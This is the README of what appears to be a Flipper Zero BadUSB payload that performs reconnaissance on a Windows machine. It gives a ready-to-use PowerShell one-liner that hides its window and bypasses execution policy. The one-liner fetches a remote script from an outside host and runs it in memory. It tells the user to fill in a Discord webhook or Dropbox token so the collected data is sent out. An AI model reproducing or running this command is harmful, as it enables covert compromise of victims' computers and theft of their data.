I-Am-Jakoby/Flipper-Zero-BadUSB/Payloads/Flip-ADV-Recon/README.md

 * Plug in your device
 * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

+`$dc` is the variable that stores your discord webhook

+`$db` is the variable that stores your dropbox token

+Fill in either or both of these to methods to exfil your collected data

 ```
 powershell -w h -NoP -Ep Bypass $dc='';$db='';iwr jakoby.lol/aucrjmf | iex
 ```